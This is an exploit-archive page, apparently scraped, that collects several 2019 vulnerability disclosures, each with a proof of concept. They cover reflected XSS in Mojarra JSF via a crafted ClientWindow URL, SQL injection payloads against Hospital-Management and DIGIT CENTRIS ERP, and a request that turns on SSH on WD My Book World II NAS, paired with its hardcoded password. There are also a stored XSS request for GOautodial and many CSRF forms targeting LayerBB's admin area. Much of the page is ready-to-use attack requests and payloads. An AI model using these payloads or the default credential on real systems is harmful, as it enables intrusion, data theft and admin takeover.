Oracle Mojarra JSF / Eclipse Mojarra JSF 2.2 / 2.3 Cross Site Scripting


Oracle Mojarra JSF included in Java EE 7 and Eclipse Mojarra JSF versions 2.2 and 2.3 suffer from a cross site scripting vulnerability.


MD5 | 57c400c42855631e353fa4caef39f82f

SEC Consult Vulnerability Lab Security Advisory < 20190918-0 >
=======================================================================
title: Reflected Cross-Site Scripting (XSS)
product: Oracle Mojarra JSF included in Java EE 7
Eclipse Mojarra JSF
vulnerable version: 2.2 & 2.3
fixed version: https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_2X_ROLLING
https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_3X_ROLLING
https://github.com/eclipse-ee4j/mojarra
CVE number: -
impact: Medium
homepage: https://javaserverfaces.github.io/
found: 2018-11-12
by: Jean-Benjamin Rousseau (Office Zurich)
Guillaume Crouquet (Office Zurich)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"JavaServer Faces technology simplifies building user interfaces for
JavaServer applications. Developers can build web applications by
assembling reuseable UI components in a page; connecting these
components to an application data source; and wiring client-generated
events to server-side event handlers. This project provides information
on the continued development of the JavaServer Faces specification.

JavaServer Faces (JSF) is a JCP Standard technology for authoring
component based user interfaces on the Java EE platform."

Source: https://javaee.github.io/javaserverfaces-spec/


Business recommendation:
------------------------
By exploiting the vulnerability documented in this advisory, an attacker
can execute arbitrary scripts in the context of the web application in the
victim's browser. Besides performing arbitrary actions within the
application with the victim's account or manipulating the application's
interface, the attacker can potentially steal session tokens, redirect
the victim to external pages and perform attacks against their browser.

SEC Consult recommends users to implement the available patches.


Vulnerability overview/description:
-----------------------------------
The Mojarra implementation of JavaServer Faces (JSF) v2.2 and v2.3
lacks input validation on the javax.faces.ClientWindow parameter which can
lead to reflected cross-site scripting (XSS) under certain conditions.

Mojarra JSF v2.2 and v2.3 are respectively the user interface
standards for Java EE 7 and Java EE 8.

The vulnerability is not directly exploitable in Mojarra JSF v2.2
and v2.3. However, different frameworks based on this library and having
a custom implementation of the Faces-Request HTTP headers for AJAX requests
might be affected. PrimeFaces v6.0 is one example of a vulnerable framework.

This vulnerability affects the web applications fulfilling the following
conditions:
- Usage of a framework based on Mojarra JSF v2.2 or v2.3
- Usage of AJAX requests in the web applications
- Custom implementation of the Faces-Request HTTP headers for AJAX requests
- Presence of the javax.faces.CLIENT_WINDOW_MODE context parameter
set to "url" in the web.xml file:

<context-param>
<param-name>javax.faces.CLIENT_WINDOW_MODE</param-name>
<param-value>url</param-value>
</context-param>


Proof of concept:
-----------------
In this proof of concept, the tests are based on PrimeFaces v6.0,
an open source framework for JSF. Other frameworks based on
Mojarra JSF 2.2 or 2.3 might also be affected.

Step 1: Generate an AJAX request on the web application and intercept it.
-----------
POST /HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0 HTTP/1.1
Host: $IP
Content-Length: 405
Accept: application/xml, text/xml, */*; q=0.01
Origin: http://$IP
X-Requested-With: XMLHttpRequest
Faces-Request: partial/ajax
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=2a616ef87aeed7521b02ceb4e163
Connection: close

javax.faces.partial.ajax=true&javax.faces.source=j_idt18%3AbtnSurname&javax.faces.partial.execute=j_idt18%3AbtnSurname+j_idt18%3Asurname&javax.faces.partial.render=j_idt18%3Agrid&j_idt18%3AbtnSurname=j_idt18%3AbtnSurname&j_idt18=j_idt18&j_idt18%3Afirstname=&j_idt18%3Asurname=surname&javax.faces.ViewState=7025249133904776332%3A-921340693957557245&javax.faces.ClientWindow=2a616ef87aeed7521b02ceb4e163%3A0
-----------

Step 2: Transpose the POST parameters into GET parameters and
build a new URL with it.

http://$IP/HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0&javax.faces.partial.ajax=true&javax.faces.source=j_idt18%3AbtnSurname&javax.faces.partial.execute=j_idt18%3AbtnSurname+j_idt18%3Asurname&javax.faces.partial.render=j_idt18%3Agrid&j_idt18%3AbtnSurname=j_idt18%3AbtnSurname&j_idt18=j_idt18&j_idt18%3Afirstname=&j_idt18%3Asurname=surname&javax.faces.ViewState=7025249133904776332%3A-921340693957557245&javax.faces.ClientWindow=2a616ef87aeed7521b02ceb4e163%3A0


Step 3: Strip out the javax.faces.ViewState GET parameter from the URL.

http://localhost:8080/HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0&javax.faces.partial.ajax=true&javax.faces.source=j_idt18%3AbtnSurname&javax.faces.partial.execute=j_idt18%3AbtnSurname+j_idt18%3Asurname&javax.faces.partial.render=j_idt18%3Agrid&j_idt18%3AbtnSurname=j_idt18%3AbtnSurname&j_idt18=j_idt18&j_idt18%3Afirstname=&j_idt18%3Asurname=surname&javax.faces.ClientWindow=2a616ef87aeed7521b02ceb4e163%3A0


Step 4: Prefix the javax.faces.ClientWindow GET parameter with
the following PoC payload:

]]></update><something%3ascript+xmlns%3asomething%3d"http%3a//www.w3.org/1999/xhtml">alert('SEC
Consult')</something%3ascript><update+id%3d"j_id1%3ajavax.faces.ClientWindow%3a0"><![CDATA[

Resulting URL:

http://$IP/HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0&javax.faces.partial.ajax=true&javax.faces.source=j_idt18%3AbtnSurname&javax.faces.partial.execute=j_idt18%3AbtnSurname+j_idt18%3Asurname&javax.faces.partial.render=j_idt18%3Agrid&j_idt18%3AbtnSurname=j_idt18%3AbtnSurname&j_idt18=j_idt18&j_idt18%3Afirstname=&j_idt18%3Asurname=surname&javax.faces.ClientWindow=]]></update><something%3ascript+xmlns%3asomething%3d"http%3a//www.w3.org/1999/xhtml">alert('SEC+Consult')</something%3ascript><update+id%3d"j_id1%3ajavax.faces.ClientWindow%3a0"><![CDATA[2a616ef87aeed7521b02ceb4e163%3A0


Step 5: To trigger the XSS, the victim just needs to browse to the crafted link
of step 4.


Vulnerable / tested versions:
-----------------------------
The following versions were assessed:
* Mojarra JSF v2.2 included in Java EE 7
* Mojarra JSF v2.3 included in Java EE 8 has not been tested
but is affected according to the vendor


Vendor contact timeline:
------------------------
Oracle:
2018-11-22: Contacting vendor through secalert_us@oracle.com
2018-11-27: Initial response from Oracle. Monthly updates will be
provided until the issue is addressed.
2018-12-15: Request from Oracle for technical details.
2018-12-17: Response with requested details
Error in the transmission of the e-mail.
2019-01-11: Request from Oracle to delay the release date
when a fix will be provided.
2019-01-15: Extension of the release and retransmission of the technical
details from the previous mail.
2019-02-01: Request from Oracle to extend the release date after
the 16th of April 2019.
2019-02-04: Extension of the release date.
2019-02-05: Acknowledgment of receipt from Oracle.
2019-04-11: Release of a fix for versions 2.2 and 2.3 of Oracle Mojarra JSF
2019-04-29: SEC Consult: fix is incomplete and only filters script tags, request
for a CVE number and credits.
2019-04-30: Request from Oracle for details for crediting
2019-04-30: Provision of details from SEC Consult
2019-05-07: Confirmation of credits in the Oracle Critical Patch Update
Advisory - April 2019
2019-08-30: Confirmation by Oracle that a patch has been applied


Eclipse:
2019-06-13: Contacting vendor through bugs.eclipse.org
2019-08-23: Project lead replied that he will take care of this issue
2019-08-28: Asked for an update; no response received

2019-09-18: Release of security advisory


Solution:
---------
Oracle has addressed the reported issue for the versions 2.2 and 2.3:
https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_2X_ROLLING
https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_3X_ROLLING

JSF is part of Java EE SDK, but Java EE is not a supported product, so
Oracle will not be announcing the fixes through their Critical Patch Update.

Eclipse has also been contacted, but no patch has been confirmed yet.


Workaround:
-----------
None. Note that, per the conditions listed above, the payload only reaches the
javax.faces.ClientWindow parameter when javax.faces.CLIENT_WINDOW_MODE is set
to "url" in web.xml; deployments that do not need URL-mode client windows
remove that precondition. That is a mitigation of the exposure, not a fix for
the missing input validation.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Jean-Benjamin Rousseau - Guillaume Crouquet / @2019


Hospital-Management 1.26 SQL Injection


Hospital-Management version 1.26 suffers from a remote SQL injection vulnerability.


MD5 | b3bc4b70753666ea3c77040cafd689b7

# Exploit Title: Hospital-Management 1.26 - 'fname' SQL Injection
# Author: Cakes
# Discovery Date: 2019-09-18
# Vendor Homepage: https://github.com/Mugerwa-Joseph/hospital-management
# Software Link: https://github.com/Mugerwa-Joseph/hospital-management/archive/master.zip
# Tested Version: 1.26
# Tested on OS: CentOS 7
# CVE: N/A

# Description:
# SQL injection in the 'fname' field, reachable only after authenticating to the
# application. The original does not name the target script; the payloads below
# are the POST bodies (the Type/Title lines appear to be sqlmap output).

# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload:

fname=tester'||(SELECT 0x72516679 FROM DUAL WHERE 9119=9119 AND 1379=1379)||'&sname=tester&email=test@tester.com&phone=1123456783&address=123 happy lane&gender=Male&bloodgroup=B&birthyear=2002&btn=Add

# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload:

fname=tester'||(SELECT 0x53495778 FROM DUAL WHERE 5761=5761 AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x71787a7a71,(SELECT (ELT(9648=9648,1))),0x716b786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&sname=tester&email=test@tester.com&phone=1123456783&address=123 happy lane&gender=Male&bloodgroup=B&birthyear=2002&btn=Add

# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload:

fname=tester'||(SELECT 0x5144494b FROM DUAL WHERE 1043=1043 AND (SELECT 1880 FROM (SELECT(SLEEP(5)))AmmF))||'&sname=tester&email=test@tester.com&phone=1123456783&address=123 happy lane&gender=Male&bloodgroup=B&birthyear=2002&btn=Add

macOS 18.7.0 Kernel Local Privilege Escalation

Western Digital My Book World II NAS 1.02.12 Hardcoded Credential


Western Digital My Book World II NAS versions 1.02.12 and below have a hard-coded ssh credential that allows for remote command execution.


MD5 | 3808a885298919e8f753b294c96ace56

# Exploit Title: Western Digital My Book World II NAS <= 1.02.12 - Broken Authentication to RCE
# Google Dork: intitle:"My Book World Edition - MyBookWorld"
# Date: 19th Sep, 2019
# Exploit Author: Noman Riffat, National Security Services Group (NSSG)
# Vendor Homepage: https://wd.com/
# Software Link: https://support.wdc.com/downloads.aspx?p=130&lang=en
# Version: <= 1.02.12
# Tested on: Firmware
# CVE : CVE-2019-16399
POST /admin/system_advanced.php?lang=en HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
Content-Length: 241

orig_ssl_key=&orig_ssl_certificate=&submit_type=ssh&current_ssh=&enablessh=yes&Submit=Submit&ssl_certificate=Paste+a+signed+certificate+in+X.509+PEM+format+here.&ssl_key=Paste+a+RSA+private+key+in+PEM+format+here.&hddstandby=on&ledcontrol=on
/*
The default SSH password is 'welc0me', and the only measure preventing an SSH login is that the SSH service is disabled; the POST request above enables it, after which the attacker can log in over SSH with the default password (the SSH username, and whether the POST itself requires an authenticated admin session, are not stated in the original advisory). The WD My Book World II NAS is very outdated hardware and Western Digital may never release an update for it. It still runs PHP 4, so further remote exploits are likely. All firmware versions listed at https://support.wdc.com/downloads.aspx?p=130&lang=en are vulnerable.
An update is unlikely; to stay safe, retire this NAS and move to current hardware.
*/
Security Researcher - Noman Riffat, National Security Services Group (NSSG)
@nomanriffat, @nssgoman


TOR Virtual Network Tunneling Tool 0.4.1.6


Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. It provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. Individuals can use it to keep remote Websites from tracking them and their family members. They can also use it to connect to resources such as news sites or instant messaging services that are blocked by their local Internet service providers (ISPs).


MD5 | d5e290d2a09d4225693cebc37a83097f


DIGIT CENTRIS 4 ERP SQL Injection


DIGIT CENTRIS 4 ERP suffers from a remote SQL injection vulnerability.


MD5 | 66111e2cb97a8f518d8d693b7be8b05d

# Exploit Title: DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection
# Date: 2019-09-19
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: http://www.digit-rs.com/
# Product Homepage: http://digit-rs.com/centris.html
# Version: Every version (as claimed by the author; not independently verified)
# CVE : N/A

# Vulnerable parameters: datum1, datum2, KID, PID

# [POST REQUEST] (the '" values below are error-probe markers in each parameter, not a complete extraction payload)

POST /korisnikinfo.php HTTP/1.1
Content-Length: 65
Content-Type: application/x-www-form-urlencoded
Referer: http://host
Host: host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

ListaPDF=Lista%20u%20PDF&datum1=1'"&datum2=01.01.2001'"&KID=1'"&PID=1'"

GOautodial 4.0 Cross Site Scripting


GOautodial version 4.0 suffers from a persistent cross site scripting vulnerability in the CreateEvent flow.


MD5 | 06e513908ec4cf29eb4b367076db6e10

# Exploit Title: GOautodial 4.0 - 'CreateEvent' Persistent Cross-Site Scripting
# Author: Cakes
# Discovery Date: 2019-09-19
# Vendor Homepage: https://goautodial.org/
# Software Link: https://downloads2.goautodial.org/centos/7/isos/x86_64/GOautodial-4-x86_64-Pre-Release-20180929-0618.iso
# Tested Version: 4.0
# Tested on OS: CentOS 7
# CVE: N/A

# Description:
# Stored (persistent) XSS, requiring an authenticated session (PHPSESSID below).
# The `title` parameter sent to CreateEvent.php appears to be stored unsanitized
# and the script fires when the saved event is rendered (events.php, judging by
# the Referer in the request).

# POST Request

POST /php/CreateEvent.php HTTP/1.1
Host: 10.0.0.25
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.25/events.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 69
Cookie: PHPSESSID=b9jgg31ufmmgf84qdd6jq6v3i1
Connection: close
DNT: 1

title=%3Cscript%3Ealert(%22TEST%22)%3B%3C%2Fscript%3E&color=%2300c0ef

LayerBB 1.1.3 Cross Site Request Forgery


LayerBB version 1.1.3 suffers from a cross site request forgery vulnerability.


MD5 | b599fecb0f9a19d1ceb90b55d70b84bc

# Exploit Title: LayerBB 1.1.3 - Multiple CSRF
# Date: 4/7/2019
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://forum.layerbb.com/downloads.php?view=file&id=30
# Version: 1.1.3
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-16531


1. Description:
LayerBB is a free open-source forum software. Multiple CSRF vulnerabilities were found in its admin area, e.g. editing users, usergroups, categories and nodes. The proof-of-concept forms below carry no anti-CSRF token; an administrator who is logged in and submits one of them (or is lured to a page that auto-submits it) performs the action on the attacker's behalf. Adjust the "http://localhost" action URLs and the numeric ids to the target.


2. Proof of Concepts:

<!-- Edit Usergroup CSRF -->
<form action="http://localhost/admin/edit_usergroup.php/id/1" method="POST" style="padding: 25px;">
<label for="g_name">Name</label>
<input type="text" name="g_name" id="g_name" value="User" class="form-control">
<label for="g_style">Style <small><code>%username%</code> will be replaced with the user's username.</small></label>
<textarea name="g_style" id="g_style" class="form-control"><span>%username%</span></textarea>
<label for="b_style_s">Banner Style Start</label>
<textarea name="b_style_s" id="b_style_s" class="form-control"><span class="label label -default"></textarea>
<label for="b_style_e">Banner Style End</label>
<textarea name="b_style_e" id="b_style_e" class="form-control"></span></textarea>
<label for="permissions">Permissions</label><br>
<input type="checkbox" name="permissions[]" value="1" checked=""> view_forum<br><input type="checkbox" name="permissions[]" value="2" checked=""> create_thread<br><input type="checkbox" name="permissions[]" value="3" checked=""> reply_thread<br><input type="checkbox" name="permissions[]" value="4"> access_moderation<br><input type="checkbox" name="permissions[]" value="5"> access_administration<br>
<br>
<input type="checkbox" name="is_staff" value="1"> This Usergroup is staff.
<br>
<input type="submit" name="update" value="Save Changes" class="btn btn-default">
</form>
<!-- Edit Usergroup CSRF End -->

<!-- Edit User CSRF -->
<form action="http://localhost/admin/edit_user.php/id/1" method="POST" style="padding: 25px;">
<label for="username">Username</label>
<input type="text" name="username" id="username" value="Administrator" class="form-control">
<label for="email">Email Address</label>
<input type="text" name="email" id="email" value="demo@layerbb.com" class="form-control">
<label for="usermsg">User Message</label>
<input type="text" name="usermsg" id="usermsg" value="User" class="form-control">
<label for="signature">User Signature</label>
<textarea id="editor" name="signature" class="form-control" style="min-height:250px;"></textarea>
<label for="disabled">User Activated</label><br>
<input type="radio" name="disabled" value="0" checked=""> Do Not Change<br>
<input type="radio" name="disabled" value="0"> Active<br>
<input type="radio" name="disabled" value="1"> Disabled<br>
<br>
<label for="usergroup">Usergroup</label><br>
<select name="usergroup" id="usergroup" style="width:100%;">
<option value="4" selected="">Dont Change</option>
<option value="1">User</option><option value="2">Banned</option><option value="3">Moderator</option><option value="4">Administrator</option>
</select><br><br>
<input type="submit" name="update" value="Save Changes" class="btn btn-default">
</form>
<!-- Edit User CSRF End -->

<!-- Edit Category CSRF -->
<form action="http://localhost/admin/edit_category.php/id/1" method="POST" style="padding: 25px;">
<label for="cat_title">Title</label>
<input type="text" name="cat_title" id="cat_title" value="First Category" class="form-control">
<label for="cat_desc">Description</label>
<textarea name="cat_desc" id="cat_desc" class="form-control">First category on this forum!</textarea>
<br>
<label for="allowed_usergroups">Allowed Usergroups</label><br>
<input type="checkbox" name="allowed_ug[]" value="0" checked=""> Guest<br><input type="checkbox" name="allowed_ug[]" value="1" checked=""> User<br><input type="checkbox" name="allowed_ug[]" value="2"> Banned<br><input type="checkbox" name="allowed_ug[]" value="3" checked=""> Moderator<br><input type="checkbox" name="allowed_ug[]" value="4" checked=""> Administrator<br>
<br>
<input type="submit" name="update" value="Save Changes" class="btn btn-default">
</form>
<!-- Edit Category CSRF End -->

<!-- Edit Node CSRF -->
<form action="http://localhost/admin/edit_node.php/id/1" method="POST" style="padding: 25px;">
<label for="cat_title">Title</label>
<input type="text" name="node_title" id="cat_title" value="First Node" class="form-control">
<label for="cat_desc">Description</label>
<textarea name="node_desc" id="cat_desc" class="form-control">The first node on this forum</textarea>
<label for="parent">Parent</label><br>
<select name="node_parent" id="parent" style="width:100%;">
<option value="1" selected="">First Category</option>
</select>
<br>
<label for="additional_option">Additional Options</label><br>
<input type="checkbox" name="lock_node" value="1" id="lock_node"> <label style="font-weight: normal;" for="lock_node">Lock Node</label>
<br>
<label for="allowed_usergroups">Allowed Usergroups</label><br>
<input type="checkbox" name="allowed_ug[]" value="0" checked=""> Guest<br><input type="checkbox" name="allowed_ug[]" value="1" checked=""> User<br><input type="checkbox" name="allowed_ug[]" value="2"> Banned<br><input type="checkbox" name="allowed_ug[]" value="3" checked=""> Moderator<br><input type="checkbox" name="allowed_ug[]" value="4" checked=""> Administrator<br>
<label for="labels">Labels</label> <small>Each Line is a new label. HTML enabled.</small>
<textarea name="labels" id="labels" class="form-control"></textarea><br>
<input type="submit" name="update" value="Save Changes" class="btn btn-default">
</form>
<!-- Edit Node CSRF End -->

<!-- System Settings CSRF -->
<form action="http://localhost/admin/general.php" enctype="multipart/form-data" method="POST"><section class="col-lg-12">
<div class="box box-success">
<div class="box-header">
<div class="tab-content" style="padding: 25px;">
<br>
<label for="site_name">Board Name</label>
<input type="text" class="form-control" name="site_name" id="site_name" value="LayerBB Demo">
<label for="board_email">Board Email</label>
<input type="text" class="form-control" name="board_email" id="board_email" value="demo@layerbb.com">
<label for="number_subs">Number of shown subforums</label>
<input type="text" class="form-control" name="number_subs" id="number_subs" value="3">
<input type="checkbox" name="register_enable" value="1" id="reg_enable" checked=""> <label for="reg_enable">Enable Registeration</label><br>
<input type="checkbox" name="post_merge" value="1" id="post_merge" checked=""> <label for="post_merge">Merge Posts (<a href="#" title="Merge consecutive posts by the same user." id="tooltip">?</a>)</label><br>
<input type="checkbox" name="site_enable" value="1" id="site_enable" checked=""> <label for="site_enable">Forum Enabled (<a href="#" title="Allows you to enable or disable your forums." id="tooltip">?</a>)</label><br>
<input type="checkbox" name="email_verify" value="1" id="email_verify"> <label for="email_verify">Email Verification (<a href="#" title="Allows you to enable or disable email verification." id="tooltip">?</a>)</label><br>
<input type="checkbox" name="enable_signatures" value="1" id="enable_signatures" checked=""> <label for="enable_signatures">Allow user signatures (<a href="#" title="Allows you to disable user signatures." id="tooltip">?</a>)</label><br>
<input type="checkbox" name="enable_pcomments" value="1" id="enable_pcomments" checked=""> <label for="enable_pcomments">Enable Profile Comments (<a href="#" title="Allows you to disable profile comments." id="tooltip">?</a>)</label><br>
<br>
<label for="default_language">Default Languge</label><br>
<select name="default_language" id="Default_language" class="form-control">
<option value="english" selected="">English</option>
</select><br>
<input type="checkbox" name="enable_rtl" value="1" id="enable_rtl"> <label for="enable_rtl">Enable RTL (<a href="#" title="Enable Right-to-left for languages that need RTL" id="tooltip">?</a>)</label><br><br>
<label for="board_rules">Board Rules</label>
<span id="helpBlock" class="help-block">HTML tags will be converted into ascii codes. Hyperlinks are not supported!</span>
<textarea name="board_rules" class="form-control" style="min-height:250px;">- No spamming.</textarea>
<br>
<label for="offline_msg">Offline Message</label>
<span id="helpBlock" class="help-block">HTML tags will be converted into ascii codes.</span>
<textarea name="offline_msg" class="form-control" style="min-height:250px;"></textarea>
<br>
<label for="rcap_public">reCaptcha Public Key</label>
<input type="text" name="rcap_public" id="rcap_public" class="form-control" value="0">
<label for="rcap_private">reCaptcha Private Key</label>
<input type="text" name="rcap_private" id="rcap_private" class="form-control" value="0">
<input type="checkbox" name="enable_recaptcha" value="1"> Use reCaptcha<br>
<br>
<label for="content">Board Signature</label>
<textarea id="editor" name="board_signature" class="form-control" style="min-height:250px;"></textarea>
<div class="alert alert-info" role="alert"><b>Please Note:</b> HTML Tags do not work, line breaks and urls are automatically converted!</div>
<br>
<label for="custom_logo">Easy Logo Changer</label>
<input type="file" name="custom_logo" id="custom_logo" class="form-control">

</div><br>
<center><input type="submit" name="update" class="btn btn-default" value="Save Settings"></center><br>
</div>
</div></section>
</form>
<!-- System Settings CSRF End -->

<!-- Manage Category CSRF -->
<table class="table table-hover">
<thead>
<tr>
<th style="width:70%">Category</th>
<th style="width:10%">Order</th>
<th style="width:20%">Controls</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<strong>test cat</strong><br>
<small>test cat</small>
</td>
<td>
<form action="http://localhost/admin/manage_category.php" method="POST">
<input type="hidden" name="cat_id" value="2">
<input type="text" class="form-control" name="cat_place" value="1">
<input type="submit" name="change_place" style="display:none;">
</form>
</td>
<td>
<div class="btn-group">
<li><a href="http://localhost/admin/edit_category.php/id/2">Edit Category</a></li>
<li><a href="http://localhost/admin/manage_category.php/delete_category/2">Delete Category</a></li>
</div>
</td>
</tr><tr>
<td>
<strong>First Category</strong><br>
<small>First category on this forum!</small>
</td>
<td>
<form action="http://localhost/admin/manage_category.php" method="POST">
<input type="hidden" name="cat_id" value="1">
<input type="text" class="form-control" name="cat_place" value="2">
<input type="submit" name="change_place" style="display:none;">
</form>
</td>
<td>
<div class="btn-group">
<li><a href="http://localhost/admin/edit_category.php/id/1">Edit Category</a></li>
<li><a href="http://localhost/admin/manage_category.php/delete_category/1">Delete Category</a></li>
</div>
</td>
</tr>
</tbody>
</table>
<center><h3>Use <font color="red">ENTER</font> to save catagory order</h3></center>
<!-- Manage Category CSRF End -->

<!-- Manage Node CSRF -->
<table class="table table-hover">
<thead>
<tr>
<th style="width:70%">Node</th>
<th style="width:10%">Order</th>
<th style="width:20%">Controls</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<strong><a href="#" target="_blank">First Node</a></strong><br>
<small>The first node on this forum</small><br>
<small>Sub-Forums: </small>
</td>
<td>
<form action="http://localhost/admin/manage_node.php" method="POST">
<input type="hidden" name="node_id" value="1">
<input type="text" class="form-control" name="node_place" value="0">
<input type="submit" name="change_place" style="display:none;">
</form>
</td>
<td>
<div class="btn-group">
<li><a href="http://localhost/admin/edit_node.php/id/1">Edit Node</a></li>
<li><a href="http://localhost/admin/manage_node.php/delete_node/1">Delete Node</a></li>
<li><a href="http://localhost/admin/manage_node.php/toggle_lock/1">Toggle Lock</a></li>
</div>
</td>
</tr>
</tbody>
</table>
<center><h3>Use <font color="red">ENTER</font> to save catagory order</h3></center>
<!-- Manage Node CSRF End -->

<!-- Mass Mail CSRF -->
<form action="http://localhost/admin/massemail.php" method="POST" style="padding: 25px;">
<label for="subject">Subject</label>
<input type="text" name="subject" id="subject" value="" class="form-control">
<label for="content">Email Content</label>
<textarea id="editor" name="content" class="form-control" style="min-height:250px;"></textarea><br>
<div class="alert alert-info" role="alert"><b>Please Note:</b> HTML Tags do not work, line breaks and urls are automatically converted!</div>
<input type="submit" name="send" value="Send Email" class="btn btn-default">
</form>
<!-- Mass Mail CSRF End -->

<!-- Navbar CSRF -->
<form method="POST" action="http://localhost/admin/navbar.php">
<h4 class="modal-title" id="myModalLabel">Editing <b>google</b> Navbar Item</h4>
<input type="hidden" name="id" value="1">
<div class="form-group">
<label for="title">URL Title</label>
<input type="text" class="form-control" id="title" name="title" value="google">
</div>
<div class="form-group">
<label for="url">URL</label>
<input type="text" class="form-control" id="url" name="url" value="https://google.com">
</div>
<div class="form-group">
<label for="newpage">Open URL in new page</label>
<select class="form-control" id="newpage" name="newpage">
<option value="1">Current - Do Not Change</option>
<option value="1">Yes</option>
<option value="0">No</option>
</select>
</div>
<div class="form-group">
<label for="order">Order</label>
<input type="text" class="form-control" id="order" name="order" value="1">
</div>
<button type="submit" name="savechange" id="savechange" class="btn btn-primary">Save Changes</button>
</form>
<!-- Navbar CSRF End -->

<!-- New Category CSRF -->
<form action="http://localhost/admin/new_category.php" method="POST" style="padding: 25px;">
<label for="cat_title">Title</label>
<input type="text" name="cat_title" id="cat_title" class="form-control">
<label for="cat_desc">Description</label>
<textarea name="cat_desc" id="cat_desc" class="form-control"></textarea>
<br>
<label for="allowed_usergroups">Allowed Usergroups</label>
<br>
<input type="checkbox" name="allowed_ug[]" value="1" checked=""> User<br><input type="checkbox" name="allowed_ug[]" value="2" checked=""> Banned<br><input type="checkbox" name="allowed_ug[]" value="3" checked=""> Moderator<br><input type="checkbox" name="allowed_ug[]" value="4" checked=""> Administrator<br>
<br>
<input type="submit" name="create" value="Create Category" class="btn btn-default">
</form>
<!-- New Category CSRF End -->

<!-- New Node CSRF -->
<form action="http://localhost/admin/new_node.php" method="POST" style="padding: 25px;">
<!-- CSRF PoC (admin area): POSTs node_title, node_desc, node_parent, lock_node,
     allowed_ug[] and labels to /admin/new_node.php without any anti-CSRF token.
     The page itself advertises labels as "HTML enabled", so the labels field is
     a place where raw markup is accepted by design. -->
<label for="node_title">Title</label>
<input type="text" name="node_title" id="node_title" class="form-control">
<label for="node_desc">Description</label>
<textarea name="node_desc" id="node_desc" class="form-control"></textarea>
<label for="parent">Parent</label><br>
<select name="node_parent" id="parent">
<!-- NOTE(review): value="&1" on the second option looks like an extraction artifact
     (the first option uses a plain numeric id) -- confirm the real parent id against
     the target before relying on this form. -->
<option value="1">First Category</option><option value="&1">&nbsp;&nbsp;&nbsp;&nbsp;-First Node</option>
</select>
<br>
<label for="additional_option">Additional Options</label><br>
<input type="checkbox" name="lock_node" value="1" id="lock_node"> <label style="font-weight: normal;" for="lock_node">Lock Node</label>
<br>
<label for="allowed_usergroups">Allowed Usergroups</label>
<br>
<input type="checkbox" name="allowed_ug[]" value="1" checked=""> User<br><input type="checkbox" name="allowed_ug[]" value="2" checked=""> Banned<br><input type="checkbox" name="allowed_ug[]" value="3" checked=""> Moderator<br><input type="checkbox" name="allowed_ug[]" value="4" checked=""> Administrator<br>
